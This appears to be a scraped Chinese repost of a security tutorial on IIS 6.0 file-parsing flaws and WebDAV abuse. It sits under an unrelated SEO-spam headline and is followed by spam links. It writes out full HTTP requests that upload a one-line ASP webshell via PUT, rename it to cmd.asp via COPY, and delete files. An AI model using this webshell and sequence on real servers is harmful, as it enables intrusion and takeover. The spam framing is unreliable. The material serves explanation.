当前位置: 首页 > news >正文

牙科医院网站建设免费网站推广软文发布

news 2025/7/21 8:48:11
牙科医院网站建设,免费网站推广软文发布,郑州政策最新消息,梧州网站优化公司IIS 6.0在解析文件时存在以下两个解析漏洞。 ①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。 例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为&…

IIS 6.0在解析文件时存在以下两个解析漏洞。

①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。

例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为<%=NOW()%>,然后在浏览器内访问。

“NOW()”是ASP提供获取当前时间的函数,TXT是文本文档格式,IIS是不会去解析此类文件的,应该会直接显示其内容,而在 parsing.asp文件夹中,却被当作ASP脚本来解析。

② 当文件为*.asp;1.jpg时,IIS 6.0同样会以ASP脚本来执行如:新建文件 test.asp;1.jpg,内容为<%=NOW()%>

微软并不认为这是一个漏洞,也一直没有推出IIS 6.0的补丁,所以这两个"漏洞"至今还存在,让无数的网站“死”在了IIS 6.0解析漏洞之上。

说到IIS容器,就不得不提起一个经典的漏洞,漏洞名为WebDav。

WebDav(Web-based Distributed Authoring and Versioning)是一种基于HTTP1.1协议的通信协议,它扩展了HTTP协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使HTTP协议更强大。

在开启WebDav扩展的服务器后,如果支持PUT、Move、Copy、Delete等方法,就可能会存在一些安全隐患,比如www.secbug.org服务器(IIS 6.0 Web容器)支持WebDav,并且存在PUT、Move、Copy、Delete等方法,那么攻击者就可能通过PUT方法向服务器上传危险脚本文件,测试步骤如下。

第一步:通过OPTIONS探测服务器所支持的HTTP方法。请求:

OPTIONS / HTTP/1.1 Host:www.secbug.org

响应:

HTTP/1.1 200 OK 
Cache-Control:private
Date: Mon,19 Aug 2013 09:41:45 GMT
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPPATCH, SEARC H,MKCOL,LOCK,UNLOCK Content-Length: 0 
Accept-Ranges: none 
Server: Microsoft-IIS/6.0 MS-Author-Via: DAV DASL:<DAV:sql>DAV: 1, 2
Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH Set-Cookie:_D_SID=89113465;path=/;

第二步:通过PUT方法向服务器上传脚本文件。

请求:

PUT/a.txt HTTP/1.1 
Host:www.secbug.org 
Content-Length:30 
<%eval request("chopper")%>

响应:

HTTP/1.1 201 Created
Date: Mon,19 Aug 2013 09:48:10 GMT
Allow:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,COPY,MOVE,PROPFIND,PROPPATCH, SEARCH,LOCK,UNLOCK Content-Length: 0
Location:http://www.secbug.org/a.txt Server: Microsoft-IIS/6.0

第三步:通过Move或Copy方法改名

COPY /a.txt HTTP/1.1 
Host:www.secbug.org
Destination:http://www.secbug.org/cmd.asp
HTTP/1.1 201 Created
Date: Mon,19 Aug 2013 09:53:43 GMT 
Content-Length: 0 
Content-Type: text/xml
Location:http://www.secbug.org/cmd.asp 
Server: Microsoft-IIS/6.0

通过这三个步骤,攻击者就可以轻易获取一个WebShell。

如果服务器开启了DELETE方法,攻击者还可以删除服务器上的任意文件。

DELETE /a.txt HTTP/1.1 Host:www.secbug.org
HTTP/1.1 200 OK
Date: Mon,19 Aug 2013 10:02:08 GMT 
Content-Length: 0 
Server: Microsoft-IIS/6.0
Set-Cookie: _D_SID=89113465;
path=/;

http://www.dt0577.cn/news/49862.html

相关文章:

  • 网页链接提取码怎么用seo推荐
  • 个性化网站定制价格深圳seo专家
  • 做微信广告网站有哪些整合营销传播成功案例
  • 做网站挂广告赚钱犯法吗可以看封禁网站的浏览器
  • 做网站用方正字体可以额的宁波优化seo是什么
  • 陕西省城乡住房建设厅官网广州百度seo排名优化
  • 个人域名备案做企业网站网络营销方式
  • 网站建设宗旨seo外链发布
  • 做专业的精品套图网站百度竞价返点开户
  • 做期货都看那些网站推广产品的软文怎么写
  • 黄页网站介绍百度seo排名如何提升
  • 印团网网站是哪家做的优化大师绿色版
  • 让网站做的有吸引力网络视频营销的案例
  • 上海网络网站建设网络营销属于什么专业类型
  • 婚纱网站布局ppt怎么做软文广告是什么
  • cms 做网站西安百度关键词优化
  • 国内十大网站制作公司免费新闻源发布平台
  • 做网站管理员开会怎么演讲推广方案怎么写
  • wordpress 网站日志下百度安装
  • 做网站怎么单独写手机页面搜索引擎关键词广告
  • 网站空格键代码天津seo优化
  • 全国疫情最新通报河南网站seo
  • 建设专业网站的价格seo的名词解释
  • 中国城乡建设委员会网站seo发帖软件
  • 做短视频网站有流量吗今日财经最新消息
  • 婚恋网站如何做推广html简单网页成品
  • 网站建设哪家好知道seo是什么职位缩写
  • 网站构架图怎么做推广普通话宣传周活动方案
  • 怎样给网站做流量今日新闻最新头条
  • 网站网页设计要求广州网站seo推广